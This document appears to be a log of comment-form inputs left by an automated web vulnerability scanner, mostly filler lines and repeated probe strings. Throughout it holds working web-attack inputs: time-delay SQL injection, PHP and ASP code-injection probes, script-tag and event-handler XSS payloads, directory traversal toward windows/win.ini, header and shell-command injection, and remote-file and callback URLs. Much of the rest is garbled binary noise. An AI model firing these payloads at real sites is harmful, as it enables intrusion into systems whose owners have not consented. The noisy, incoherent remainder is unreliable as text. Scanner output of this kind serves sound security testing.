.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml?
WEB-INF\web.xml?
ytsf9hnF'));select pg_sleep(12); --
${9999953+10000292}
1
12345'"\'\");|]*{
<>�''💩
add-comment=add-comment
1
1
1
1
1
12345'"\'\");|]*{
<>�''💩
add-comment=add-comment
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
1
1&n953301=v942323
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
testasp.vulnweb.com
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
)
1
1
1
!(()&&!|*|*|
1
1
1
1
^(#$!@#$)(()))******
1
1
;print(md5(acunetix_wvs_security_test));
1
';print(md5(acunetix_wvs_security_test));$a='
";print(md5(acunetix_wvs_security_test));$a="
)
${@print(md5(acunetix_wvs_security_test))}
!(()&&!|*|*|
^(#$!@#$)(()))******
)
!(()&&!|*|*|
1
'"()
1
1
'"()
1
'"()
1
^(#$!@#$)(()))******
1
1
${@print(md5(acunetix_wvs_security_test))}\
1
;print(md5(acunetix_wvs_security_test));
1
';print(md5(acunetix_wvs_security_test));$a='
1
";print(md5(acunetix_wvs_security_test));$a="
1
${@print(md5(acunetix_wvs_security_test))}
${@print(md5(acunetix_wvs_security_test))}\
;print(md5(acunetix_wvs_security_test));
1
';print(md5(acunetix_wvs_security_test));$a='
1
1
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
${@print(md5(acunetix_wvs_security_test))}\
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
Http://testasp.vulnweb.com/t/fit.txt
1
1
1
http://testasp.vulnweb.com/t/fit.txt?.jpg
testasp.vulnweb.com
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1some_inexistent_file_with_long_name.jpg
1
Http://testasp.vulnweb.com/t/fit.txt
1
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
testasp.vulnweb.com
http://testasp.vulnweb.com/t/xss.html?%00.jpg
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
deneme
1
1
1
1
1
deneme
1
1
deneme/.
1
1
deneme
1
deneme
1
deneme/.
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://hitH7uVnfy9xM.bxss.me/
1
http://hitOVpKKlsxuy.bxss.me/
deneme
1
1
1
1
http://hit1Qgpu3LtvU.bxss.me/
deneme
deneme/.
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"
1
\
1
1
1����
1
1
1
1
1
1
1
@@O370X
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
JyI=
1
�'�"
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
�''�""
1
(select convert(int,CHAR(65)))
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1'"
\
1����
@@D4f4A
JyI=
www.vulnweb.com
1
�'�"
1
�''�""
1
(select convert(int,CHAR(65)))
1
1'"
1
1
1
\
1
www.vulnweb.com
1
1
'"
1
www.vulnweb.com
1����
1
1
1
1
1
1
1
1
1
1
'"
1
1
1
1
@@q7KTO
1
'"
1
1
1
1
JyI=
�'�"
1
1
1
1
�''�""
1
1
1
1
1
1
1
1
1
1
1
1
1
(select convert(int,CHAR(65)))
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
add-comment=add-comment'"()&%
1
1
1
1
'"()&%
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
add-comment=add-comment_919374
1
1
1
1
1
1
1
1
1
acu8062<s1﹥s2ʺs3ʹuca8062
1
1
1
1
1
1
acux9456��z1��z2a�bcxuca9456
1
1
1
1
1
1
acu163%6xuca163AAAAA
1
1
1
1
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
1
add-comment=add-comment
1
1
1
add-comment=add-comment
1
1
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(920564)
add-comment=add-comment
1
1
1
add-comment=add-comment
1
1
1
1
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(949821)%3E
1
add-comment=add-comment<div></div>
1
1
1
1
add-comment=add-comment
1
1
1
1
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
1
1
1
1
1
1
add-comment=add-comment<img src="xyz">
1
1
1
1
1
1
1
1
add-comment=add-comment<img src=">">
1
1
1
1
add-comment%3dadd-comment
1
1
1
1
1
1
1
1
1
add-comment=add-comment<ScRiPt>prompt(982382)</sCripT>
1
1
1
1
1
1
1
1
1
1
1
�<img>
1
1
1
1
1
add-comment=add-comment<input>
1
1
<a href="http://www.vulnweb.com"></a>
1
<a></a>
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
[url=http://www.vulnweb.com][/url]
1
1
1
add-comment=add-comment
1
1
1
1
1
1
1
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(973157))}
1
1
add-comment=add-comment_QvLeg
1
1
add-comment=add-comment
1
1
1
1
1
1
1
1
1
1
1
add-comment=add-comment
1
1
1
1
add-comment=add-comment'"()&%
1
1
1
'"()&%
1
1
1
add-comment=add-comment_957393
1
1
acu8516<s1﹥s2ʺs3ʹuca8516
acux4248��z1��z2a�bcxuca4248
1
1
1
1
1
acu142%6xuca142AAAAA
1
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
1
1
add-comment=add-comment
1
add-comment=add-commentIpT>
1
1
1
1
1
1
1
1
1
1
add-comment=add-comment
1
1
1
1
1
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(993004)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(953960)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(920971)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(950311))}
add-comment=add-comment_N4PTh
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_998777
acu1158<s1﹥s2ʺs3ʹuca1158
acux9085��z1��z2a�bcxuca9085
acu154%6xuca154AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(927357)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(959504)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(900977)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(999760))}
add-comment=add-comment_Pbquh
add-comment=add-comment
add-comment=add-comment
1
1
1
1
1
1
1
1
1
1
response.write(9727258*9234051)
'+response.write(9727258*9234051)+'
"+response.write(9727258*9234051)+"
add-comment=add-comment
add-comment=add-comment
2s1Vg1kr
-1 OR 2+462-462-1=0+0+0+1 --
-1 OR 2+379-379-1=0+0+0+1
-1' OR 2+207-207-1=0+0+0+1 --
-1" OR 2+332-332-1=0+0+0+1 --
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 waitfor delay '0:0:6' --
5tgKNJzC'; waitfor delay '0:0:9' --
uvMsFWuB'); waitfor delay '0:0:9' --
YpeJC2Zj')); waitfor delay '0:0:3' --
l5bUv00M';select pg_sleep(3); --
tRgTiZqu');select pg_sleep(3); --
5lZP5OMa'));select pg_sleep(3); --
SomeCustomInjectedHeader:injected_by_wvs
set|set&set
'set|set&set'
"set|set&set"
set|set&set
SomeCustomInjectedHeader:injected_by_wvs
SomeCustomInjectedHeader:injected_by_wvs
`set|set&set`
;set|set&set;
../../../../../../../../../../windows/win.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini.jpg
������������������������������������������������windows��win.ini
................windowswin.ini
..\..\..\..\..\..\..\..\windows\win.ini
12345'"\'\");|]*{
<>�''💩
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
add-comment=add-comment
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
${9999833+10000477}
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
Http://testasp.vulnweb.com/t/fit.txt
http://testasp.vulnweb.com/t/fit.txt?.jpg
WEB-INF/web.xml?
testasp.vulnweb.com
1&n961290=v980168
)
!(()&&!|*|*|
^(#$!@#$)(()))******
WEB-INF\web.xml?
;print(md5(acunetix_wvs_security_test));
';print(md5(acunetix_wvs_security_test));$a='
";print(md5(acunetix_wvs_security_test));$a="
${@print(md5(acunetix_wvs_security_test))}
'"()
http://testasp.vulnweb.com/t/xss.html?%00.jpg
deneme
deneme
deneme/.
http://hitntAo6Jofw5.bxss.me/
1'"
\
1����
${@print(md5(acunetix_wvs_security_test))}\
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
www.vulnweb.com
'"
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_902390
acu6239<s1﹥s2ʺs3ʹuca6239
acux1652��z1��z2a�bcxuca1652
acu142%6xuca142AAAAA
@@ChXqH
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
JyI=
�'�"
add-comment=add-comment
add-comment=add-comment
�''�""
(select convert(int,CHAR(65)))
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(931375)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(999320)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(917202)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(985170))}
add-comment=add-comment_QfQtu
add-comment=add-comment
add-comment=add-comment
1acuxpkNdJ99BX
1
1acutoDTnZgsDj
1
1acuvyRsPulsil
1
1
1
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_994024
acu1545<s1﹥s2ʺs3ʹuca1545
acux10644��z1��z2a�bcxuca10644
acu129%6xuca129AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(916837)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(905747)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(987741)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(934859))}
add-comment=add-comment_qGSUZ
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_982901
acu3182<s1﹥s2ʺs3ʹuca3182
acux3986��z1��z2a�bcxuca3986
acu112%6xuca112AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(979693)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(961737)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(935672)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(982047))}
add-comment=add-comment_mEcbf
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_993229
acu5433<s1﹥s2ʺs3ʹuca5433
acux1254��z1��z2a�bcxuca1254
acu105%6xuca105AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(913015)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(909852)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(950656)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(915968))}
add-comment=add-comment_6zHuo
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_901382
acu4656<s1﹥s2ʺs3ʹuca4656
acux2590��z1��z2a�bcxuca2590
acu107%6xuca107AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(929554)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(958137)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(933989)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(936082))}
add-comment=add-comment_m7jwi
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_952685
acu4226<s1﹥s2ʺs3ʹuca4226
acux5921��z1��z2a�bcxuca5921
acu142%6xuca142AAAAA
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
add-comment=add-comment
add-comment=add-comment
add-comment=add-commentIpT>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<ScRiPt
>prompt(958474)
add-comment=add-comment
add-comment=add-comment
add-comment%3Dadd-comment%3Csvg%20onload%3Dprompt(999646)%3E
add-comment=add-comment<div></div>
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment<img src="//testasp.vulnweb.com/t/dot.gif">
add-comment=add-comment<img src="xyz">
add-comment=add-comment<img src=">">
add-comment%3dadd-comment
add-comment=add-comment<ScRiPt>prompt(982115)</sCripT>
�<img>
add-comment=add-comment<input>
<a href="http://www.vulnweb.com"></a>
<a></a>
[url=http://www.vulnweb.com][/url]
add-comment=add-comment
add-comment=add-comment}body{acu:Expre/**/SSion(prompt(979715))}
add-comment=add-comment_XRbN0
add-comment=add-comment
add-comment=add-comment
add-comment=add-comment'"()&%
'"()&%
add-comment=add-comment_969601
